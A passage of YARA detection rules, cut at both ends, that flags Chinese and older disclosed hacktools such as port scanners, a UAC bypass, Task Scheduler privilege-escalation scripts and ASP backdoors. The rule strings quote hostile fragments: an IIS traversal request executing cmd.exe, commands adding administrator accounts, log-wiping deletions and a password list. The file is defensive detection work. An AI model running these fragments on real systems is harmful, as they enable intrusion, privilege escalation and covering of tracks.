   	strings:   
   		$s0 = "SELECT A.USER FROM SYS.USER_USERS A " fullword ascii   
   		$s12 = "OCI 8 - OCIDescriptorFree" fullword ascii   
   		$s13 = "ORACommand *" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 835KB and all of them   
rule CN_GUI_Scanner {   
   	meta:   
   		description = "Detects an unknown GUI scanner tool - CN background"   
   		author = "Florian Roth"   
   		hash = "3c67bbb1911cdaef5e675c56145e1112"   
   		score = 65   
   		date = "04.10.2014"   
   	strings:   
   		$s1 = "good.txt" fullword ascii   
   		$s2 = "IP.txt" fullword ascii   
   		$s3 = "xiaoyuer" fullword ascii   
   		$s0w = "ssh(" fullword wide   
   		$s1w = ").exe" fullword wide   
   	condition:   
   		all of them   
rule MooreR_Port_Scanner {   
   	meta:   
   		description = "Auto-generated rule on file MooreR Port Scanner.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "376304acdd0b0251c8b19fea20bb6f5b"   
   	strings:   
   		$s0 = "Description|"   
   		$s3 = "soft Visual Studio\\VB9yp"   
   		$s4 = "adj_fptan?4"   
   		$s7 = "DOWS\\SyMem32\\/o"   
   	condition:   
   		all of them   
rule SwitchSniffer {   
   	meta:   
   		description = "Chinese Hacktool Set - file SwitchSniffer.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "1e7507162154f67dff4417f1f5d18b4ade5cf0cd"   
   	strings:   
   		$s0 = "NextSecurity.NET" fullword wide   
   		$s2 = "SwitchSniffer Setup" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and all of them   
rule sig_238_listip {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file listip.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b"   
   	strings:   
   		$s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii   
   		$s2 = "ERROR No.2!!! Program Terminate." fullword ascii   
   		$s4 = "Local Host Name: %s" fullword ascii   
   		$s5 = "Packed by exe32pack 1.38" fullword ascii   
   		$s7 = "Local Computer Name: %s" fullword ascii   
   		$s8 = "Local IP Adress: %s" fullword ascii   
   	condition:   
   		all of them   
rule Guilin_veterans_cookie_spoofing_tool {   
   	meta:   
   		description = "Chinese Hacktool Set - file Guilin veterans cookie spoofing tool.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "06b1969bc35b2ee8d66f7ce8a2120d3016a00bb1"   
   	strings:   
   		$s0 = "kernel32.dll^G" fullword ascii   
   		$s1 = "\\.Sus\"B" fullword ascii   
   		$s4 = "u56Load3" fullword ascii   
   		$s11 = "O MYTMP(iM) VALUES (" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1387KB and all of them   
rule PortScanner {   
   	meta:   
   		description = "Auto-generated rule on file PortScanner.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "b381b9212282c0c650cb4b0323436c63"   
   	strings:   
   		$s0 = "Scan Ports Every"   
   		$s3 = "Scan All Possible Ports!"   
   	condition:   
   		all of them   
rule BypassUac_EXE {   
   	meta:   
   		description = "Auto-generated rule - file BypassUacDll.aps"   
   		author = "yarGen Yara Rule Generator"   
   		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"   
   	strings:   
   		$s1 = "Wole32.dll" wide   
   		$s3 = "System32\\migwiz" wide   
   		$s4 = "System32\\migwiz\\CRYPTBASE.dll" wide   
   		$s5 = "Elevation:Administrator!new:" wide   
   		$s6 = "BypassUac" wide   
   	condition:   
   		all of them   
rule sig_238_Glass2k {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file Glass2k.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a"   
   	strings:   
   		$s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii   
   		$s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii   
   		$s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii   
   		$s4 = "Glass2k.exe" fullword wide   
   		$s7 = "NeoLite Executable File Compressor" fullword ascii   
   	condition:   
   		all of them   
rule Dos_NtGod {   
   	meta:   
   		description = "Chinese Hacktool Set - file NtGod.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "adefd901d6bbd8437116f0170b9c28a76d4a87bf"   
   	strings:   
   		$s0 = "\\temp\\NtGodMode.exe" ascii   
   		$s4 = "NtGodMode.exe" fullword ascii   
   		$s10 = "ntgod.bat" fullword ascii   
   		$s19 = "sfxcmd" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 250KB and all of them   
rule PScan_Portscan_1 {   
   	meta:   
   		description = "PScan - Port Scanner"   
   		author = "F. Roth"   
   		score = 50   
   	strings:   
   		$a = "00050;0F0M0X0a0v0}0"   
   		$b = "vwgvwgvP76"   
   		$c = "Pr0PhOFyP"   
   	condition:   
   		all of them   
rule sig_238_concon {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file concon.com"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1"   
   	strings:   
   		$s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii   
   	condition:   
   		all of them   
rule Dos_c {   
   	meta:   
   		description = "Chinese Hacktool Set - file c.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "3deb6bd52fdac6d5a3e9a91c585d67820ab4df78"   
   	strings:   
   		$s0 = "!Win32 .EXE." fullword ascii   
   		$s1 = ".MPRESS1" fullword ascii   
   		$s2 = ".MPRESS2" fullword ascii   
   		$s3 = "XOLEHLP.dll" fullword ascii   
   		$s4 = "</body></html>" fullword ascii   
   		$s8 = "DtcGetTransactionManagerExA" fullword ascii  /* Goodware String - occured 12 times */   
   		$s9 = "GetUserNameA" fullword ascii  /* Goodware String - occured 305 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 100KB and all of them   
rule dll_PacketX {   
   	meta:   
   		description = "Chinese Hacktool Set - file PacketX.dll - ActiveX wrapper for WinPcap packet capture library"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		score = 50   
   		hash = "3f0908e0a38512d2a4fb05a824aa0f6cf3ba3b71"   
   	strings:   
   		$s9 = "[Failed to load winpcap packet.dll." wide   
   		$s10 = "PacketX Version" wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1920KB and all of them   
rule EditKeyLog {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "a450c31f13c23426b24624f53873e4fc3777dc6b"   
   	strings:   
   		$s1 = "Press Any Ke" fullword ascii   
   		$s2 = "Enter 1 O" fullword ascii   
   		$s3 = "Bon >0 & <65535L" fullword ascii   
   		$s4 = "--Choose " fullword ascii   
   	condition:   
   		all of them   
rule sig_238_2323 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file 2323.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763"   
   	strings:   
   		$s0 = "port - Port to listen on, defaults to 2323" fullword ascii   
   		$s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii   
   		$s3 = "Failed to execute shell" fullword ascii   
   		$s5 = "/h   - Hide Window" fullword ascii   
   		$s7 = "Accepted connection from client at %s" fullword ascii   
   		$s9 = "Error %d: %s" fullword ascii   
   	condition:   
   		all of them   
rule unknown2 {   
   	meta:   
   		description = "Chinese Hacktool Set - file unknown2.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "32508d75c3d95e045ddc82cb829281a288bd5aa3"   
   	strings:   
   		$s1 = "http://md5.com.cn/index.php/md5reverse/index/md/" fullword wide   
   		$s2 = "http://www.md5decrypter.co.uk/feed/api.aspx?" fullword wide   
   		$s3 = "http://www.md5.com.cn" fullword wide   
   		$s4 = "1.5.exe" fullword wide   
   		$s5 = "\\Set.ini" fullword wide   
   		$s6 = "OpenFileDialog1" fullword wide   
   		$s7 = " (*.txt)|*.txt" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 300KB and 4 of them   
rule ipsearcher {   
   	meta:   
   		description = "Chinese Hacktool Set - file ipsearcher.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "1e96e9c5c56fcbea94d26ce0b3f1548b224a4791"   
   	strings:   
   		$s0 = "http://www.wzpg.com" fullword ascii   
   		$s1 = "ipsearcher\\ipsearcher\\Release\\ipsearcher.pdb" fullword ascii   
   		$s3 = "_GetAddress" fullword ascii   
   		$s5 = "ipsearcher.dll" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 140KB and all of them   
rule scanarator {   
   	meta:   
   		description = "Auto-generated rule on file scanarator.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "848bd5a518e0b6c05bd29aceb8536c46"   
   	strings:   
   		$s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"   
   	condition:   
   		all of them   
rule sqlcheck {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7"   
   	strings:   
   		$s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii   
   		$s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii   
   		$s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii   
   		$s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii   
   		$s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii   
   	condition:   
   		3 of them   
rule Hacktools_CN_JoHor_Posts_Killer {   
   	meta:   
   		description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a"   
   	strings:   
   		$s0 = "Multithreading Posts_Send Killer" fullword ascii   
   		$s3 = "GET [Access Point] HTTP/1.1" fullword ascii   
   		$s6 = "The program's need files was not exist!" fullword ascii   
   		$s7 = "JoHor_Posts_Killer" fullword wide   
   		$s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii   
   		$s10 = "  ( /s ) :" fullword ascii   
   		$s11 = "forms.vbp" fullword ascii   
   		$s12 = "forms.vcp" fullword ascii   
   		$s13 = "Software\\FlySky\\E\\Install" fullword ascii   
   	condition:   
   		5 of them   
rule sig_238_filespy {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file filespy.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 50   
   		hash = "89d8490039778f8c5f07aa7fd476170293d24d26"   
   	strings:   
   		$s0 = "Hit [Enter] to begin command mode..." fullword ascii   
   		$s1 = "If you are in command mode," fullword ascii   
   		$s2 = "[/l] lists all the drives the monitor is currently attached to" fullword ascii   
   		$s9 = "FileSpy.exe" fullword wide   
   		$s12 = "ERROR starting FileSpy..." fullword ascii   
   		$s16 = "exe\\filespy.dbg" fullword ascii   
   		$s17 = "[/d <drive>] detaches monitor from <drive>" fullword ascii   
   		$s19 = "Should be logging to screen..." fullword ascii   
   		$s20 = "Filmon:  Unknown log record type" fullword ascii   
   	condition:   
   		7 of them   
rule BluesPortScan {   
   	meta:   
   		description = "Auto-generated rule on file BluesPortScan.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "6292f5fc737511f91af5e35643fc9eef"   
   	strings:   
   		$s0 = "This program was made by Volker Voss"   
   		$s1 = "JiBOo~SSB"   
   	condition:   
   		all of them   
rule wce   
   {   
   	meta:   
   		description		= "wce"   
   		author			= "Benjamin DELPY (gentilkiwi)"   
   		tool_author		= "Hernan Ochoa (hernano)"   
      
   	strings:   
   		$hex_legacy		= { 8b ff 55 8b ec 6a 00 ff 75 0c ff 75 08 e8 [0-3] 5d c2 08 00 }   
   		$hex_x86		= { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] 50 72 69 6d 61 72 79 00 }   
   		$hex_x64		= { ff f3 48 83 ec 30 48 8b d9 48 8d 15 [0-16] 50 72 69 6d 61 72 79 00 }   
      
   	condition:   
   		any of them   
rule ms10048_x64 {   
   	meta:   
   		description = "Chinese Hacktool Set - file ms10048-x64.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"   
   	strings:   
   		$s1 = "The target is most likely patched." fullword ascii   
   		$s2 = "Dojibiron by Ronald Huizer, (c) master#h4cker.us  " fullword ascii   
   		$s3 = "[ ] Creating evil window" fullword ascii   
   		$s4 = "[+] Set to %d exploit half succeeded" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 40KB and 1 of them   
rule iKAT_priv_esc_tasksch {   
   	meta:   
   		description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista."   
   		author = "Florian Roth"   
   		date = "05.11.14"   
   		score = 75   
   		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"   
   		hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b"   
   	strings:   
   		$s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii   
   		$s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii   
   		$s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii   
   		$s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii   
   		$s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii   
   		$s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii   
   		$s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii   
   		$s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii   
   		$s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii   
   		$s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii   
   		$s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii   
   		$s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii   
   		$s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii   
   	condition:   
   		2 of them   
rule DTools2_02_DTools {   
   	meta:   
   		description = "Chinese Hacktool Set - file DTools.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "9f99771427120d09ec7afa3b21a1cb9ed720af12"   
   	strings:   
   		$s0 = "kernel32.dll" ascii   
   		$s1 = "TSETPASSWORDFORM" fullword wide   
   		$s2 = "TGETNTUSERNAMEFORM" fullword wide   
   		$s3 = "TPORTFORM" fullword wide   
   		$s4 = "ShellFold" fullword ascii   
   		$s5 = "DefaultPHotLigh" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 2000KB and all of them   
rule sig_238_eee {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file eee.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "236916ce2980c359ff1d5001af6dacb99227d9cb"   
   	strings:   
   		$s0 = "szj1230@yesky.com" fullword wide   
   		$s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii   
   		$s4 = "MailTo:szj1230@yesky.com" fullword wide   
   		$s5 = "Command1_Click" fullword ascii   
   		$s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide   
   		$s11 = "vb5chs.dll" fullword ascii   
   		$s12 = "MSVBVM50.DLL" fullword ascii   
   	condition:   
   		all of them   
rule aspbackdoor_EDIR {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb"   
   	strings:   
   		$s1 = "response.write \"<a href='index.asp'>" fullword ascii   
   		$s3 = "if Request.Cookies(\"password\")=\"" ascii   
   		$s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii   
   		$s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii   
   		$s19 = "whichdir=Request(\"path\")" fullword ascii   
   	condition:   
   		all of them   
rule dat_xpf {   
   	meta:   
   		description = "Chinese Hacktool Set - file xpf.sys"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "761125ab594f8dc996da4ce8ce50deba49c81846"   
   	strings:   
   		$s1 = "UnHook IoGetDeviceObjectPointer ok!" fullword ascii   
   		$s2 = "\\Device\\XScanPF" fullword wide   
   		$s3 = "\\DosDevices\\XScanPF" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 25KB and all of them   
rule sig_238_rshsvc {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file rshsvc.bat"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "fb15c31254a21412aecff6a6c4c19304eb5e7d75"   
   	strings:   
   		$s0 = "if not exist %1\\rshsetup.exe goto ERROR2" fullword ascii   
   		$s1 = "ECHO rshsetup.exe is not found in the %1 directory" fullword ascii   
   		$s9 = "REM %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dll" fullword ascii   
   		$s10 = "copy %1\\rshsvc.exe" fullword ascii   
   		$s12 = "ECHO Use \"net start rshsvc\" to start the service." fullword ascii   
   		$s13 = "rshsetup %SystemRoot%\\system32\\rshsvc.exe %SystemRoot%\\system32\\rshsvc.dll" fullword ascii   
   		$s18 = "pushd %SystemRoot%\\system32" fullword ascii   
   	condition:   
   		all of them   
rule WinEggDropShellFinal_zip_Folder_InjectT {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "516e80e4a25660954de8c12313e2d7642bdb79dd"   
   	strings:   
   		$s0 = "Packed by exe32pack" ascii   
   		$s1 = "2TInject.Dll" fullword ascii   
   		$s2 = "Windows Services" fullword ascii   
   		$s3 = "Findrst6" fullword ascii   
   		$s4 = "Press Any Key To Continue......" fullword ascii   
   	condition:   
   		all of them   
rule sig_238_gina {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file gina.reg"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6"   
   	strings:   
   		$s0 = "\"gina\"=\"gina.dll\"" fullword ascii   
   		$s1 = "REGEDIT4" fullword ascii   
   		$s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii   
   	condition:   
   		all of them   
rule iKAT_cmd_as_dll {   
   	meta:   
   		description = "iKAT toolset file cmd.dll ReactOS file cloaked"   
   		author = "Florian Roth"   
   		date = "05.11.14"   
   		score = 65   
   		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"   
   		hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a"   
   	strings:   
   		$s1 = "cmd.exe" fullword wide   
   		$s2 = "ReactOS Development Team" fullword wide   
   		$s3 = "ReactOS Command Processor" fullword wide   
      
   		$ext = "extension: .dll" nocase   
   	condition:   
   		all of ($s*) and $ext   
rule Hacktools_CN_Burst_pass {   
   	meta:   
   		description = "Disclosed hacktool set - file pass.txt"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "55a05cf93dbd274355d798534be471dff26803f9"   
   	strings:   
   		$s0 = "123456.com" fullword ascii   
   		$s1 = "123123.com" fullword ascii   
   		$s2 = "360.com" fullword ascii   
   		$s3 = "123.com" fullword ascii   
   		$s4 = "juso.com" fullword ascii   
   		$s5 = "sina.com" fullword ascii   
   		$s7 = "changeme" fullword ascii   
   		$s8 = "master" fullword ascii   
   		$s9 = "google.com" fullword ascii   
   		$s10 = "chinanet" fullword ascii   
   		$s12 = "lionking" fullword ascii   
   	condition:   
   		all of them   
rule snifferport {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file snifferport.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "d14133b5eaced9b7039048d0767c544419473144"   
   	strings:   
   		$s0 = "iphlpapi.DLL" fullword ascii   
   		$s5 = "ystem\\CurrentCorolSet\\" fullword ascii   
   		$s11 = "Port.TX" fullword ascii   
   		$s12 = "32Next" fullword ascii   
   		$s13 = "V1.2 B" fullword ascii   
   	condition:   
   		all of them   
rule NtGodMode {   
   	meta:   
   		description = "Chinese Hacktool Set - file NtGodMode.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "8baac735e37523d28fdb6e736d03c67274f7db77"   
   	strings:   
   		$s0 = "to HOST!" fullword ascii   
   		$s1 = "SS.EXE" fullword ascii   
   		$s5 = "lstrlen0" fullword ascii   
   		$s6 = "Virtual" fullword ascii  /* Goodware String - occured 6 times */   
   		$s19 = "RtlUnw" fullword ascii /* Goodware String - occured 1 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 45KB and all of them   
rule Tzddos_DDoS_Tool_CN {   
   	meta:   
   		description = "Disclosed hacktool set - file tzddos"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "d4c517eda5458247edae59309453e0ae7d812f8e"   
   	strings:   
   		$s0 = "for /f %%a in (host.txt) do (" fullword ascii   
   		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii   
   		$s2 = "del host.txt /q" fullword ascii   
   		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii   
   		$s4 = "start Http.exe %%a %http%" fullword ascii   
   		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii   
   		$s6 = "del Result.txt s2.txt s1.txt " fullword ascii   
   	condition:   
   		all of them   
rule sig_238_RunAsEx {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35"   
   	strings:   
   		$s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii   
   		$s8 = "cmd.bat" fullword ascii   
   		$s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii   
   		$s11 = "%s Execute Succussifully." fullword ascii   
   		$s12 = "winsta0" fullword ascii   
   		$s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii   
   	condition:   
   		4 of them   
rule Hacktools_CN_Burst_Clear {   
   	meta:   
   		description = "Disclosed hacktool set - file Clear.bat"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4"   
   	strings:   
   		$s0 = "del /f /s /q %systemdrive%\\*.log    " fullword ascii   
   		$s1 = "del /f /s /q %windir%\\*.bak    " fullword ascii   
   		$s4 = "del /f /s /q %systemdrive%\\*.chk    " fullword ascii   
   		$s5 = "del /f /s /q %systemdrive%\\*.tmp    " fullword ascii   
   		$s8 = "del /f /q %userprofile%\\COOKIES s\\*.*    " fullword ascii   
   		$s9 = "rd /s /q %windir%\\temp & md %windir%\\temp    " fullword ascii   
   		$s11 = "del /f /s /q %systemdrive%\\recycled\\*.*    " fullword ascii   
   		$s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    " fullword ascii   
   		$s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   " ascii   
   	condition:   
   		5 of them   
rule Tiny_Network_Tool_Generic {   
   	meta:   
   		description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)"   
   		author = "Florian Roth"   
   		date = "08.10.2014"   
   		score = 40   
   		type = "file"   
   		hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07"   
   		hash1 = "cafc31d39c1e4721af3ba519759884b9"   
   		hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92"   
   	strings:   
   		$magic	= { 4d 5a }   
      
   		$s0 = "KERNEL32.DLL" fullword ascii   
   		$s1 = "CRTDLL.DLL" fullword ascii   
   		$s3 = "LoadLibraryA" fullword ascii   
   		$s4 = "GetProcAddress" fullword ascii   
      
   		$y1 = "WININET.DLL" fullword ascii   
   		$y2 = "atoi" fullword ascii   
      
   		$x1 = "ADVAPI32.DLL" fullword ascii   
   		$x2 = "USER32.DLL" fullword ascii   
   		$x3 = "wsock32.dll" fullword ascii   
   		$x4 = "FreeSid" fullword ascii   
   		$x5 = "atoi" fullword ascii   
      
   		$z1 = "ADVAPI32.DLL" fullword ascii   
   		$z2 = "USER32.DLL" fullword ascii   
   		$z3 = "FreeSid" fullword ascii   
   		$z4 = "ToAscii" fullword ascii   
      
   	condition:   
   		( $magic at 0 ) and all of ($s*) and ( all of ($y*) or all of ($x*) or all of ($z*) ) and filesize < 15KB   
rule ReactOS_cmd_valid {   
   	meta:   
   		description = "ReactOS cmd.exe with correct file name - maybe packed with software or part of hacker toolset"   
   		author = "Florian Roth"   
   		date = "05.11.14"   
   		reference = "http://www.elifulkerson.com/articles/suzy-sells-cmd-shells.php"   
   		score = 30   
   		hash = "b88f050fa69d85af3ff99af90a157435296cbb6e"   
   	strings:   
   		$s1 = "ReactOS Command Processor" fullword wide   
   		$s2 = "Copyright (C) 1994-1998 Tim Norman and others" fullword wide   
   		$s3 = "Eric Kohl and others" fullword wide   
   		$s4 = "ReactOS Operating System" fullword wide   
   	condition:   
   		all of ($s*)   
rule OtherTools_xiaoa {   
   	meta:   
   		description = "Chinese Hacktool Set - file xiaoa.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "6988acb738e78d582e3614f83993628cf92ae26d"   
   	strings:   
   		$s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii   
   		$s2 = "The shell \"cmd\" success!" fullword ascii   
   		$s3 = "Not Windows NT family OS." fullword ascii /* PEStudio Blacklist: os */   
   		$s4 = "Unable to get kernel base address." fullword ascii   
   		$s5 = "run \"%s\" failed,code: %d" fullword ascii   
   		$s6 = "Windows Kernel Local Privilege Exploit " fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 100KB and 2 of them   
rule Hacktools_CN_WinEggDrop {   
   	meta:   
   		description = "Disclosed hacktool set - file s.exe"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "7665011742ce01f57e8dc0a85d35ec556035145d"   
   	strings:   
   		$s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii   
   		$s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii   
   		$s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii   
   		$s8 = "Something Wrong About The Ports" fullword ascii   
   		$s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii   
   		$s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii   
   		$s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii   
   		$s13 = "%-16s %-5d -> \"%s\"" fullword ascii   
   		$s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii   
   		$s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii   
   		$s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" fullword ascii   
   	condition:   
   		5 of them   
rule Pc_xai {   
   	meta:   
   		description = "Chinese Hacktool Set - file xai.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "f285a59fd931ce137c08bd1f0dae858cc2486491"   
   	strings:   
   		$s1 = "Powered by CoolDiyer @ C.Rufus Security Team 05/19/2008  http://www.xcodez.com/" fullword wide   
   		$s2 = "%SystemRoot%\\System32\\" fullword ascii   
   		$s3 = "%APPDATA%\\" fullword ascii   
   		$s4 = "---- C.Rufus Security Team ----" fullword wide   
   		$s5 = "www.snzzkz.com" fullword wide   
   		$s6 = "%CommonProgramFiles%\\" fullword ascii   
   		$s7 = "GetRand.dll" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 3000KB and all of them   
rule sig_238_fscan {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file fscan.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
